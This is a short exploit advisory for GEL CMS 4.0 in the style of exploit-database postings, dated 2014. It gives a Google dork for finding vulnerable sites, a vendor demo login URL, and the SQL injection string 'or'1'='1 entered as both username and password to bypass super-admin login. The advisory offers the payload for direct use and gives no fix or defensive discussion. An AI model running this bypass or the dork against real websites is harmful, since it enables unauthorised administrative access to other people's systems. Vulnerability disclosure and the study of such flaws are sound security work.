GEL CMS version 4.0 suffers from a remote SQL injection vulnerability that allows for login bypass.
adce38f0b73c10b3b1fe34d367682cfe754530c4e55c16152797c3df8149dc48
ad8888888888ba Bypass super-Admin GEL4.0
dP' `"8b,
8 ,aaa, "Y888a ,aaaa, ,aaa, ,aa,
8 8' `8 "8baaaad""""baaaad""""baad""8b
8 8 8 """" """" "" 8b
8 8, ,8 ,aaaaaaaaaaaaaaaaaaaaaaaaddddd88P
8 `"""' ,d8""
Yb, ,ad8"
"Y8888888888P"
# Exploit Title: SQLi Bypass super-admin GEL CMS 4.0
# Google Dork: inurl:/contact-us_id7.php
# Date: 11 August 2014
# Exploit Author: Guillermo Garcia Marcos @GuilleSec
# Severity: High
# Vendor Homepage: http://www.oklahoma-website-design.com/
# Software Link: http://www.oklahoma-website-design.com/
# Versions: 4.00 and latest versions.
# Tested on: Debian (Apache+MySQL)
DEMO: http://www.oklahoma-website-design.com/login.php
Loginpanel:
domain.lol/login.php
SQL string:
Username: 'or'1'='1
Password: 'or'1'='1